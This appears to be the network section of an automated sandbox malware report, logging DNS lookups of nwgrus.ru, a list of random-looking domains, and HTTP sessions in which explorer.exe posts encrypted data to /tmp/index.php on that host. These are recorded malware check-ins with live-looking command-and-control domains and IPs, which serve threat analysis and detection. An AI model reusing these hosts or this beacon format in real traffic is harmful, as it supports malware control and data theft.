                                                                                                                            Oct 3, 2024 02:54:55.331182003 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru185.12.79.25A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331223965 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331223965 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331223965 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru189.61.54.32A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331223965 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru93.118.137.82A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331223965 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331223965 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru213.172.74.157A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331223965 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331223965 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru181.123.219.23A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331223965 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru187.131.253.169A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331223965 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru185.12.79.25A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331253052 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331253052 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331253052 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru189.61.54.32A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331253052 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru93.118.137.82A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331253052 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331253052 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru213.172.74.157A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331253052 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331253052 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru181.123.219.23A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331253052 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru187.131.253.169A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:54:55.331253052 CEST1.1.1.1192.168.2.40xeb2fNo error (0)nwgrus.ru185.12.79.25A (IP address)IN (0x0001)false
                                                                                                                            Oct 3, 2024 02:56:06.504838943 CEST1.1.1.1192.168.2.40x4823No error (0)globalviewsnature.com23.145.40.113A (IP address)IN (0x0001)false
                                                                                                                            • 23.145.40.164
                                                                                                                            • https:
                                                                                                                              • calvinandhalls.com
                                                                                                                            • dfddhctvosjupwbf.com
                                                                                                                              • nwgrus.ru
                                                                                                                            • xyqstrniaxmlxodr.org
                                                                                                                            • fsupncxklgbjs.com
                                                                                                                            • fcallrcdaowuy.net
                                                                                                                            • sahyhdmmcvpatde.org
                                                                                                                            • iqjnmccnpjtfli.org
                                                                                                                            • jkxskklaphmdca.com
                                                                                                                            • gmrribpoppj.com
                                                                                                                            • fvhbfgwwnuywwuoj.com
                                                                                                                            • wcoutespihad.com
                                                                                                                            • pmsjsfqrqyrxj.org
                                                                                                                            • etwlmvbptmw.org
                                                                                                                            • hytemqketckrb.com
                                                                                                                            • mgmthbbcemjcwdac.org
                                                                                                                            • mclmeggoidfw.net
                                                                                                                            • ywnrujdiubrl.net
                                                                                                                            • llaskwsfjjpffj.com
                                                                                                                            • nrxoolvtsikko.net
                                                                                                                            • sjiiqjlirvpxdxa.org
                                                                                                                            • vhprqvsefqk.com
                                                                                                                            • vtfvgsblgpnxu.net
                                                                                                                            • uxyakrfxevg.net
                                                                                                                            • tltlkajmdifu.org
                                                                                                                            • nsllnqutblayn.org
                                                                                                                            • qqewfcdsrwqbg.org
                                                                                                                            • pdbldukfsrlj.com
                                                                                                                            • rgaydglbcbbvar.com
                                                                                                                            • ticrvurjrjsf.com
                                                                                                                            • drnoexjyrauki.com
                                                                                                                            • wbbiwyhshhf.com
                                                                                                                            • wvjpwlsevsc.net
                                                                                                                            • vssaauwgvmedfq.net
                                                                                                                            • pubortabbcvvvfcg.com
                                                                                                                            • vfyrxdwalbtb.org
                                                                                                                            • nyhrbrqisswma.com
                                                                                                                            • mtigasxvtneuwtdj.org
                                                                                                                            • frgbxqyrenbq.net
                                                                                                                            • ahaddcjrcpv.net
                                                                                                                            • iqyabdaoinn.org
                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.449736190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:22.482182026 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://dfddhctvosjupwbf.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 349
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:22.482213974 CEST349OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 49 4c ce f8
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA .[k,vuILt+dcHODldm~OrB%>.`>#B.tTj[0Qj*|02qVqtE\$GS3
                                                                                                                            Oct 3, 2024 02:52:23.779000044 CEST152INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:23 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 04 00 00 00 72 e8 86 e4
                                                                                                                            Data Ascii: r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.449737190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:23.794410944 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://xyqstrniaxmlxodr.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 262
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:23.794430017 CEST262OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 22 36 b4 f4
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu"6aaBq8sZY,i*fLLyO0gY5(JQ7I%W%aDk7~*"Q'`="]16CEe
                                                                                                                            Oct 3, 2024 02:52:24.904617071 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:24 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.449738190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:24.989859104 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://fsupncxklgbjs.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 221
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:24.989871025 CEST221OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 48 3f d9 a5
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vuH?>XOR_Im$0%LTerAaV%2v%+TUqsC$^F"~IzGZZ+U`J'nm
                                                                                                                            Oct 3, 2024 02:52:26.182543993 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:25 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.2.449739190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:26.191899061 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://fcallrcdaowuy.net/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 202
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:26.191916943 CEST202OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 79 2e a0 e9
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vuy.\=}^=aP!y>1;bj-(_HI EL-8Xy-sMV%eU%
                                                                                                                            Oct 3, 2024 02:52:27.275322914 CEST137INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:27 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            4192.168.2.449740190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:27.290863037 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://sahyhdmmcvpatde.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 180
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:27.290905952 CEST180OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 2e 36 e6 a0
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu.6ODkD3jDW-|26J0f6HaH0$v#y*v,q_J'K
                                                                                                                            Oct 3, 2024 02:52:28.385185003 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:28 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            5192.168.2.449741190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:28.399614096 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://iqjnmccnpjtfli.org/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 255
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:28.399646044 CEST255OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 6c 2a d5 90
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vul*o1\yHF0dcw;eRWV[WwX ~#RjU\0NV)fx==8&Mtu<ao ZY
                                                                                                                            Oct 3, 2024 02:52:30.168534994 CEST137INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:29 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Oct 3, 2024 02:52:30.168641090 CEST137INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:29 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Oct 3, 2024 02:52:30.168668985 CEST137INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:29 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            6192.168.2.449742190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:30.176407099 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://jkxskklaphmdca.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 132
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:30.176431894 CEST132OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 2a 32 aa ec
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu*2POcDeoIS{![CI/kCx
                                                                                                                            Oct 3, 2024 02:52:31.280688047 CEST137INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:31 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            7192.168.2.449743190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:31.293728113 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://gmrribpoppj.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 238
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:31.293762922 CEST238OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 29 26 d8 e4
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu)&JAQD5d{ZcX.l^V]>V'H<e8lN3#A+pg2-"[6cU/7SwjHn
                                                                                                                            Oct 3, 2024 02:52:32.371716976 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:32 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            8192.168.2.449744190.219.117.240802580C:\Windows\explorer.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 3, 2024 02:52:32.385245085 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Accept: */*
                                                                                                                            Referer: http://fvhbfgwwnuywwuoj.com/
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Content-Length: 214
                                                                                                                            Host: nwgrus.ru
                                                                                                                            Oct 3, 2024 02:52:32.385245085 CEST214OUTData Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 64 04 ac e7
                                                                                                                            Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vudM00-?m(=:X~:['kHVHzCNB<SD{A&
                                                                                                                            Oct 3, 2024 02:52:33.463484049 CEST484INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.26.0
                                                                                                                            Date: Thu, 03 Oct 2024 00:52:33 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Connection: close
